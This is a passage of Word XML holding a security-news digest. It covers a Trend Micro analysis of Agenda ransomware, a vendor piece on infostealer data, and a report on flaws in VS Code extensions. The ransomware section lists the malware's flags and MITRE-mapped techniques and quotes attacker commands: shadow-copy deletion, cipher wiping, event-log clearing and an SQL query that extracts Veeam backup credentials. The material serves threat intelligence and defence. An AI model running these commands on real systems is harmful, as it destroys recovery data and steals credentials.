        <w:t>-stat - This prints stab config end exit.It appends the following extension pattern to the file name of each encrypted file (it should be noted that exact extensions may vary because they have been observed to be configured per victim or affiliate build): {Original filename}.{Original Extension}.{Random 10 Characters} It avoids encrypting files with file names that have the strings specified here.It avoids encrypting files with extensions specified here.It encrypts files found in the folders specified here.It displays the following ransom note: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Figure 3. Agenda ransomware Go variant ransom noteAgenda ransomware Rust variantIn December 2022 and February 2023,we encountered a new version of the Agenda ransomware containing more command-line arguments. As of February 2024, the Agenda ransomware's Rust variant has been observed to contain the command-line arguments specified here.The Agenda ransomware's Rust variant appends the following extension patterns to the file name of each encrypted file (it should be noted that exact extensions may vary because they have been observed to be configured per victim or affiliate build): {Original filename}.{Original Extension}.{Random 10 Characters} {Original filename}.{Original Extension}.{Random 10 Characters}.{Random} .{Random 2 Characters}-{Random 7 Characters} It avoids encrypting files with file names that have the strings specified here.It avoids encrypting files with extensions specified here.It encrypts files found in the folders specified here.It displays the following ransom note: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4. Agenda ransomware Rust variant ransom noteIt also changes the infected machine's wallpaper to the following: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5. Wallpaper used by the Agenda ransomware Rust variantAgenda ransomware Linux variantThe Agenda ransomware's Linux variant accepts the following parameters: -d | --debug - This enables debug mode (logging level set to DEBUG, disables backgrounding).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>--dry-run - This performs a scan for files to be processed but does not modify them.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-h | --help - This displays a list of commands.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-l | --log-level {number} - This sets logging level in values from 0 for FATAL up to 5 for DEBUG.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>--no-df - This ignores configured allowlists/blocklists of directories. --no-ef - This ignores configured allowlists/blocklists of extensions. --no-ff - This ignores configured allowlists/blocklists of files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>--no-proc-kill - This disables process kill.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-R | --no-rename - This disables the renaming of completed files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>--no-snap-rm - This disables snapshot deletion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>--no-vm-kill - This disables VM kill.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-p | --path {string} - This specifies the top-level directory for files search.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>--password {string} - This enters the password for startup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-r | --rename - This enables the renaming of completed files (default). -t | --timer {number} - This enables timed delay before encryption (seconds).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-w | --whitelist - This uses allowlists for inclusion instead of blocklists for exclusion (default behavior).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>-y | --yes- This assumes answer 'yes' on all questions (script mode).It appends the following extension patterns to the file name of each encrypted file (it should be noted that exact extensions may vary because they have been observed to be configured per victim or affiliate build): {Random 2 Characters}_{Random 7 Characters}It avoids encrypting files with file names that have the strings specified here.It avoids encrypting files with file paths that have the strings specified here.It avoids encrypting files with extensions specified here.It encrypts files with extensions specified here.It displays the following ransom note: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6. Agenda ransomware Linux variant ransom note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MITRE tactics and techniques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Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementExfiltrationCommand and ControlImpact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T1189 - Drive-by Compromise The Agenda ransomware has been observed being delivered using various methods such as drive-by downloads, cloned sites, hosted files, and scripted web delivery or via compromised systems.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T1091 - Replication Through Removable Media It has the capability to generate payloads that autoplay via removable media such as USB drives and CDs.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T1078 - Valid Accounts It uses compromised accounts obtained through stolen credentials and process token impersonation.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T1566.002 - Phishing: Spearphishing Link It can also arrive via emails containing malicious attachments and links or fake captcha social engineering.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T1059 - Command and Scripting Interpreter The Agenda ransomware variants (Go, Rust, Linux) accept multiple command- line parameters for configuration and execution, including options for encryption behavior, propagation, privilege escalation, safe mode, and operational customization. The specific arguments vary by variant (as discussed in the previous section).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T1059.001 - Command and Scripting Interpreter: PowerShell It executes a PowerShell command to restart the LanmanWorkstation service after modifying network share connections. It also executes PowerShell and Active Directory commands to restart services and enumerate domain computers, and supports --kill-cluster to terminate VM clusters and -- spread-vcenter to propagate in vCenter/ESXi using provided credentials and binaries.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T1569.002 - System Services: Service Execution The new Agenda Rust variants embed PsExec to perform remote service execution. When run with the -propagate or --spread arguments, the malware drops PsExec into the %UserTemp% directory and uses it to execute the malware on remote hosts.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T1569.002 - System Services: Service Execution The ransomware creates a TrueSightKiller service with the name "truesight" or starts it if it already exists. It also drops the Zemana Anti-Malware driver with a randomized name under %System%\drivers\, then creates a corresponding service entry in HKLM\SYSTEM\CurrentControlSet\Services to load the Spyboy driver.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T1129 - Shared Modules It uses TrueSightKiller (Truesight.sys), and the RogueKiller Antirootkit Driver, which are both part of Adlice's product suite.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T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder The ransomware creates a runonce autostart registry entry.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T1543.003 - Create or Modify System Process: Create or Modify System Process: Windows Service It modifies and disables the VSS service using wmic and net commands to prevent shadow copy creation.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T1547.0001 - Boot or Logon Autostart Execution: Registry Run Keys/ Startup Folder It modifies the ImagePath value in registry to ensure the executable file rush persistence-as-a-service (PaaS) upon system startup.</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T1053 - Scheduled Task/Job In specific campaigns, it has been observed to install a scheduled task named veeamupdate to execute the ransomware binary once it has compromised the machine.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T1134.001 - Access Token Manipulation: Token Impersonation/Theft The ransomware parses accounts from configuration, attempts to log in, and uses the obtained user token to create a process via CreateProcessAsUser with the -alter {port number} argument.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T1055 - Process Injection The ransomware then drops a patched DLL (pwndll.dll) in the Public folder and injects it into svchost.exe to enable continuous execution of the ransomware binary.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T1484.001 - Domain or Tenant Policy Modification: Group Policy Modification In specific campaigns, it has been observed to use an endpoint hostname as the domain controller name in administrative shares and applies malicious GPO modifications to enable additional malicious behaviors.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T1078 - Valid Accounts: Local Accounts In specific campaigns, it has been observed to create a backdoor administrative account named "Supportt" to maintain persistent elevated access using net user and net localgroup commands.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T1098 - Account Manipulation In specific campaigns, it has been observed to reset the legitimate Administrator account password to maintain control and block legitimate administrators from regaining access using net user Administrator * * * * *.</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T1562 - Impair Defenses The Agenda ransomware terminates antivirus-related services and processes to evade detection and protection. It also continuously scans running processes and sends termination commands to the eskle.sys driver via DeviceIoControl, specifying the target process name to terminate.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T1562.001 - Impair Defenses: Disable or Modify Tools It disables User Account Control (UAC), preventing prompts for administrative rights and reducing system protection.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T1480 - Execution Guardrails It requires a password key validated against a stored hash before proceeding with its routine.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T1070.001 - Indicator Removal: Clear Windows Event Logs It executes commands via wevtutil and PowerShell to clear all Windows event logs, removing forensic traces.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T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification It executes fsutil commands to modify symlink evaluation settings, redirecting file system access to alternate locations on compromised networks.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T1562.009 - Impair Defenses: Safe Mode Boot It adds a process to restart the system in Safe Mode with networking using bcdedit /set {current} safeboot network when executed with the -safe argument.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T1070.004 - Indicator Removal: File Deletion It deletes itself after execution using cmd /C timeout /T 5 &amp; Del, unless run with --no-delete. The Agenda ransomware version that was observed in February 2024 avoids self-deletion when executed with --no-destruct.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T1497.001 - Virtualization/Sandbox Evasion: System Checks It performs CPUID checks to identify its environment, and it can terminate VMs unless run with --no-vm and detect sandbox environments unless run with --no-sandbox. It also enumerates registry subkeys under System\CurrentControlSet\Enum\IDE and System\CurrentControlSet\Enum\SCSI to detect virtualization strings and exits. It also checks if Sbiedll module is loaded in memory.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T1134.005 - Access Token Manipulation: SID- History Injection When executed with --escalated --parent-sid {SID}, it can run under the context of the specified SID.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T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion When executed with --timer, it delays execution by the specified time.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T1564 - Hide Artifacts The Agenda ransomware Rust variant sampled in February 2024 modifies the VMware PowerCLI module in its propagation script to suppress error prompts during execution failures.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T1222.002 - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification The Agenda ransomware Rust variant sampled in February 2024 uses chmod in its propagation script to modify permissions of the copied file and make it executable.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T1140 - Deobfuscate/Decode Files or Information The Agenda ransomware Rust variant sampled in February 2024 uses a .NET loader that decrypts and dynamically loads an assembly, iterates through its types, and invokes an obfuscated method via reflection.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T1027.002 - Obfuscated Files or Information: Software Packing A later iteration of the Agenda ransomware Rust variant sampled in November 2024 was observed to have been loaded via process injection by NETXLOADER, which is packed with .NET Reactor v6.</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T1055.002 - Process Injection: Portable Executable Injection The Agenda ransomware Rust variant sampled in November 2024 has a loader that allocates memory with VirtualAlloc, copies the payload, changes memory protection to PAGE_EXECUTE_READWRITE using VirtualProtect, spawns a thread via CreateThread to execute the payload, and waits for termination using WaitForSingleObject.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T1553.002 - Subvert Trust Controls: Code Signing The Agenda ransomware uses KAPROCHANDLER in a signed driver to delete files and terminate processes associated with antivirus products.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T1055 - Process Injection: Thread Local Storage It also uses PuTTY (disguised as a legitimate application or renamed to mimic system processes) to hide malicious activities in plain sight. It also leverages Thread Local Storage (TLS) callbacks to stealthily execute malicious payloads.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T1081 - Credentials in Files It extracts stored usernames and passwords from the Veeam backup database by querying the Credentials table using SELECT [user_name], [password] FROM [VeeamBackup].[dbo].[Credentials].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T1057 - Process Discovery The Agenda ransomware discovers specific processes for termination. It also collects system details including OS type (Linux, Nutanix, VMKernel, FreeBSD, ESXi, Unknown), CPU count, OS version, vendor ID, processor information, and memory information.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T1135 - Network Share Discovery It enumerates network share using NetShareEnum for its network encryption.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T1082 - System Information Discovery It collects system details including OS type (Linux, VMKernel, FreeBSD, ESXi, Unknown), CPU count, OS version, vendor ID, processor information, and memory information. It also executes commands to enumerate installed products on the affected system.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T1083 - File and Directory Discovery It enumerates files on the system to identify candidates for encryption and avoids encrypting files with specific strings and extensions.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T1033 - System Owner/User Discovery It obtains a list of Active Directory computers and copies itself to them using PowerShell commands. It also retrieves user group details via whoami /groups and listed active sessions using query session.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T1087.001 - Account Discovery: Local Account The Agenda ransomware Rust variant sampled in February 2024 uses its PowerShell propagation script to enumerate ESXi hosts on the target machine.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T1087 - Account Discovery Domain Account Older Agenda campaigns have been observed to use PC Hunter and net group commands to gather Domain and Enterprise Admin group information.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T1087.002 - Account Discovery: Domain Account It gathers members of the Domain Admins and Enterprise Admins groups using net group commands.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T1018 - Remote System Discovery It discovers remote systems, particularly domain controllers, and lists all domain controllers in the specified domain using the nltest command.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T1049 - System Network Connections Discovery It uses various tools (such as WannaMine, PC Hunter, and YDArkPass) to perform port scanning, list TCP connections, check processes on ports 80 and 14444, and view current network connections.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T1046 - Network Service Discovery It uses the HRSword tool to enumerate network shares via the NetShareEnum API for its network encryption routine.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T1010 - Application Window Discovery It uses SmokeLoader to terminate specific processes by identifying their window class names.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T1021 - Remote Services Remote Desktop Protocol The Agenda ransomware enables remote desktop connections by modifying the registry via the reg add command. It also enables remote desktop connections by modifying firewall settings with netsh and altering registry keys to allow RDP sessions. It writes programs to the network share and execute commands on remote systems via PsExec, and uses Cobalt Strike to deploy additional payloads via SMB and Windows Admin Shares for lateral movement.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T1021 - Remote Services SMB/Windows Admin Shares It utilizes administrative shares to distribute malware across network endpoints.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T1021.004 - Remote Services: SSH It enables SSH for file transfer, establishes an SSH session, uploads and executes the payload on the target host, and then disconnects. It then uses PuTTY to establish SSH connections for lateral movement across compromised networks, leveraging legitimate SSH credentials obtained through credential dumping or phishing.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T1567.002 - Exfiltration to Cloud Storage Older Agenda ransomware campaigns were observed to use the cloud sync service MEGAsync to exfiltrate files from the client to a remote cloud server. The ransomware sends the gathered information via HTTP POST.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T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage The Agenda ransomware uses WinSCP to exfiltrate files from the victim environment. It also uses the s5cmd tool to selectively exfiltrate sensitive documents, emails, and database files to cloud object storage using authenticated credentials.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T1041 - Exfiltration Over C2 Channel It uses Coroxy/SystemBC to retrieve the victim's username using GetUserNameExA, encrypts it with RC4 to conceal it during transmission, and sends it to a C&amp;C server as part of initial registration.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T1071 - Application Layer Protocol: Web Protocols It communicates with its C&amp;C servers using direct TCP connections, proxy channels, and HTTP/HTTPS (Coroxy/SystemBC, SmokeLoader, Mongoose Web Server). It also abuses MeshAgent to use WebSocket over HTTPS (wss://) to connect to the MeshCentral C&amp;C server (agent.ashx).</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T1090 - Proxy: External Proxy It uses Coroxy/SystemBC to establish a proxy channel to relay encrypted traffic and signals the C&amp;C server when the session ends.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T1105 - Ingress Tool Transfer It receives and executes various payloads from the attacker, with execution behavior depending on the payload type. It transfers and executes Linux ransomware binaries on a Windows host by abusing MeshAgent.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T1188 - Multi-hop Proxy It uses Tor to route its C&amp;C communications.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T1219 - Remote Access Tools It uses legitimate remote access tools such as Remotely and MeshCentral to maintain persistent access and control over compromised systems.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T1490 - Inhibit System Recovery It deletes shadow copies using vssadmin delete shadows /all /quiet. Newer Agenda ransomware Rust versions overwrite deleted data with cipher /w:{Drive Letter}:\.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T1486 - Data Encrypted for Impact Early Agenda ransomware samples supported intermittent encryption with -n, - p, fast, skip, and step flags in configuration. The version sampled in June 2024 skips mounted shares with no-mounted and avoid prioritizing files with no-priority.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Agenda ransomware generates an AES-256 encryption key and IV using rand_read(), encrypts files with AES-256, then encrypts the key with RSA- 2048 using an embedded public key. It also supports intermittent encryption based on passed arguments and flags.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Agenda ransomware Linux variant uses RSA and AES for file encryption, supports multi-threading, and applies intermittent encryption based on configured step size.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T1489 - Service Stop It terminates and disables services.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T1491.001 - Defacement: Internal Defacement It changes the wallpaper after execution by modifying the registry and modifies the motd file to display the ransom note upon user login (as shown in the previous section).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T1531 - Account Access Removal The Agenda ransomware Rust Variant changes the root password of accessed vCenter and ESXi hosts to the ransomware execution password. Its version sampled in June 2024 can remove user access by modifying passwords when executed with --safe.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T1561.001 - Disk Wipe: Disk Content Wipe It deletes VMFS-5 and VMFS-6 virtual disks on ESXi devices and removes snapshots when running in a virtual machine.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T1496 - Resource Hijacking Early Agenda campaigns were observed downloading coinminer files. Tactics and tools used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TacticTools Execution PsExec BYOVD Lateral Movement PsExec Cobalt Strike PuTTY Discovery HRSword PC Hunter YDArkPass SmokeLoader Exfiltration MEGAsync WinSCP Coroxy/SystemBC s5cmd Defense Evasion BYOVD PuTTY NETXLOADER Command and Control Coroxy/SystemBC Mongoose Web Server MeshAgent Remotely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Top affected countries and industries based on TrendAITM threat intelligence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TrendAITM threat intelligence, there were 715 attack attempts by Agenda ransomware from January to December 2025 across systems covered by TrendAITM.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Organizations in the US received by far the highest number of attack attempts, with 209 detections. Organizations in Italy, Taiwan, Argentina, and Malaysia also recorded attack attempts from the group.</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7. Top five countries or regions by number of Agenda ransomware attack attempts from January to December 2025 across systems covered by TrendAITM, based on TrendAITM threat intelligence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Organizations in the manufacturing industry received the most attack attempts from the Agenda ransomware, followed by those in financial services, healthcare, and government.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8. Top five industries by number of Agenda ransomware attack attempts from January to December 2025 across systems covered by TrendAITM, based on TrendAITM threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2026.03.18 08:57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-agenda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How infostealers turn stolen credentials into real identities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by Specops Software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February 19, 2026 10:05 AM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Modern infostealers have expanded credential theft far beyond usernames and passwords. Over the past year, campaigns have accelerated, targeting users with little distinction between corporate employees and individuals on personal devices.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These infections routinely harvest credentials alongside broader session data and user activity. The resulting datasets are aggregated and sold by initial access brokers, then reused across attacks targeting both personal and enterprise environments.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 better understand the scope and implications of this activity, Specops researchers analyzed more than 90,000 leaked infostealer dumps, comprising over 800 million rows of data collected during active infections.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The datasets included credentials, browser cookies, browsing history, and system-level files stored locally on compromised machines.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emerges is a clear picture of how infostealer dumps allow attackers to associate technical data with real users, organizations, and behavioral patterns, making a single infection valuable long after the initial compromise. When stolen credentials become identity data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biggest risk is how easily infostealer data ties multiple accounts and behaviors back to one real person. These dumps routinely expose reused account names across services, Windows usernames, files stored in user directories, active session data, and detailed records of activity across environments.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Combined, these signals let attackers move from a single compromised credential to identifying an individual, their employer, and potentially their role within an organization.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convergence collapses the boundary between personal and professional identity that many security models still assume exists. What may start as a compromise on a personal device can quickly escalate into enterprise-level risk.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Specops Password Policy helps organizations break this link by continuously scanning Active Directory against a database of more than 5.4 billion known- compromised credentials, rather than only checking passwords at creation or reset.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Credentials that have already been exposed are blocked from being set or reused, even if they technically comply with policy, reducing the risk of compromised passwords being reused across personal and corporate accounts.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Secure your Active Directory passwords with Specops Password Policy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Verizon's Data Breach Investigation Report found stolen credentials are involved in 44.7% of breaches.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Effortlessly secure Active Directory with compliant password policies, blocking 4+ billion compromised passwords, boosting security, and slashing support hassles! Try it for free Where infostealers get your data and how they abuse it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dataset contained credentials and session data associated with a wide range of services, illustrating how infostealer data exposes both identity and access. Professional and enterprise-linked services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LinkedIn, GitHub, Microsoft Teams, Outlook, and corporate domains appeared frequently in the dataset. LinkedIn alone accounted for nearly 900,000 records, providing a direct path from stolen data to real names, job titles, and organizational affiliations.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threat actors, this information enables targeted phishing, social engineering, and prioritization of access that may lead deeper into enterprise environments, especially where password reuse exists. Personal identity and social platforms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YouTube, Facebook, and similar social media platforms also made high-volume appearances. These services often contain real names, photos, and social connections, making it easier to validate the identity of a compromised user and link them to other accounts.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correlation makes targeted exploitation far easier. Sensitive and high- risk services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dataset also included credentials and cookies associated with sensitive services, including government and tax-related domains such as the IRS and the Canada Revenue Agency, as well as adult content platforms. Access to these services introduces risks beyond traditional account takeover.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previous incidents, threat actors have used data from adult platforms as leverage for extortion and blackmail. When that activity can be linked back to an individual's real identity and employer, the potential impact escalates quickly. Security-aware yet still exposed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Domains such as Shodan and even mil.gov appeared within the dataset, reinforcing an uncomfortable reality: technical awareness does not equal immunity.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Secure practices followed in corporate environments do not always extend to personal systems, yet exposure on those systems can still create enterprise risk. Why infostealers remain so effective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Infostealer exposure isn't driven by a single failure, but by a combination of common behaviors repeated at scale. Users install applications from illicit sources, reuse passwords across personal and corporate accounts, and rely on browser-based credential storage for convenience.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Browser-stored credentials and payment data are especially valuable to attackers.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When an infostealer compromises a system, these stores provide attackers with immediate access to high-value information, significantly increasing the impact of a single infection. Reducing impact after credential theft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Once infostealer data has been collected and circulated, prevention is no longer the only challenge. The real question is how quickly defenders can neutralize it before it's reused for lateral movement, account takeover, or ransomware deployment.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Because infostealer dumps often circulate for weeks or months before detection, effective mitigation must assume that some credentials are already exposed.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Password reuse remains one of the most reliable ways attackers operationalize infostealer data. Credentials harvested from personal devices are routinely tested against corporate environments, cloud services, and remote access systems, often with success even when those passwords meet standard complexity requirements.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Disrupting reuse directly reduces the operational value of infostealer datasets and shortens their window of exploitation.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Combined with stronger password policies that support longer passphrases and continuous enforcement, these controls shift password security from a static configuration exercise to an active containment measure.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Identity exposure increasingly begins outside the corporate perimeter, so reducing the reuse and downstream impact of stolen credentials remains one of the most effective ways to break infostealer-driven attack chains.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 see how Specops Password Policy helps block compromised passwords and reduce credential reuse in Active Directory, request a live demo from a Specops expert.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and written by Specops Software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2026.02.19 19:03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/how-infostealers-turn-stolen-credentials-into-real-identities/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Flaws in four popular VS Code extensions left 128 million installs open to attack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Feb 18, 2026</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Three of the four vulnerabilities remained unpatched months after OX Security reported them to the maintainers.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Credit: PeopleImages | shutterstock.com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Critical and high-severity vulnerabilities were found in four widely used Visual Studio Code extensions with a combined 128 million downloads, exposing developers to file theft, remote code execution, and local network reconnaissance.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Application security company OX Security published the findings this week, saying it had begun notifying vendors in June 2025 but received no response from three of the four maintainers.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Three CVEs, CVE-2025-65717, CVE-2025-65715, and CVE-2025-65716, were formally assigned and published on February 16.</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VS Code extensions are add-ons that expand the functionality of Microsoft's widely used code editor, adding capabilities such as language support, debugging tools, live preview, and code execution. They run with broad access to local files, terminals, and network resources, which is what made these vulnerabilities consequential.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Unlike the rogue extensions that threat actors have repeatedly planted in the VS Code marketplace, these flaws resided in legitimate, widely installed tools, meaning developers had no reason to suspect them, OX Security said in an advisory.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"Our research demonstrates that a hacker needs only one malicious extension, or a single vulnerability within one extension, to perform lateral movement and compromise entire organizations," the advisory added.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vulnerabilities also affected Cursor and Windsurf, the AI-powered IDEs built on VS Code's extension infrastructure.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OX Security published individual advisories for each flaw, detailing how each could be exploited and what an attacker could achieve. How the attacks worked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most severe flaw, CVE-2025-65717 (critical), was in Live Server, a 72- million-download extension that launches a local HTTP server for real-time browser previews. OX Security found the server was reachable from any web page a developer visited while it was running, not just their own browser.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"Attackers only need to send a malicious link to the victim while Live Server is running in the background," OX Security researchers Moshe Siman Tov Bustan and Nir Zadok wrote in an advisory.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CVE-2025-65715 (high severity) affected Code Runner, with 37 million downloads. The extension reads execution commands from a global configuration file, and OX Security found a crafted entry that was enough to trigger arbitrary code execution, including reverse shells. An attacker could place it by phishing a developer into pasting a malicious snippet, or through a compromised extension that modified the file silently.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CVE-2025-65716 (CVSS 8.8) affected Markdown Preview Enhanced, with 8.5 million downloads. Simply opening an untrusted Markdown file was enough to trigger it. "A malicious Markdown file could trigger scripts or embedded content that collects information about open ports on the victim's machine," the researchers noted.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Microsoft quietly patched its own extension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fourth vulnerability played out differently. Microsoft's Live Preview extension, with 11 million downloads, contained a cross-site scripting flaw that, according to OX Security, let a malicious web page enumerate files in the root of a developer's machine and exfiltrate credentials, access keys, and other secrets.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researchers reported the issue to Microsoft on August 7. Microsoft initially rated it as low severity, citing required user interaction.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on September 11, 2025 - without notifying us - Microsoft quietly released a patch addressing the XSS security issues we reported. We only recently discovered that this patch had been deployed," the researchers added.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 CVE was assigned to this vulnerability. "Users with Live Preview installed should update to version 0.4.16 or later immediately," the researchers suggested.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Microsoft did not immediately respond to a request for comment.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Taken together, the four flaws pointed to a broader problem with how developer tools are secured and maintained.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security teams should do</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"These vulnerabilities confirm that IDEs are the weakest link in an organization's supply chain security," the researchers at OX Security said in the advisory.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Developer workstations routinely hold API keys, cloud credentials, database connection strings, and SSH keys. OX Security warned that a successful exfiltration from a single machine could give an attacker access to an organization's broader infrastructure and that the risks extended to lateral movement and full system takeover.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researchers advised developers to disable extensions not actively in use and avoid browsing untrusted sites while localhost servers are running. They also cautioned against applying configuration snippets from unverified sources to VS Code's global settings.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Gyana Swain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Gyana Swain is a seasoned technology journalist with over 20 years' experience covering the telecom and IT space. He is a consulting editor with VARINDIA and earlier in his career, he held editorial positions at CyberMedia, PTI, 9dot9 Media, and Dennis Publishing. A published author of two books, he combines industry insight with narrative depth. Outside of work, he's a keen traveler and cricket enthusiast. He earned a B.S. degree from Utkal University.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>InfoWorld 2026.02.18 14:45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
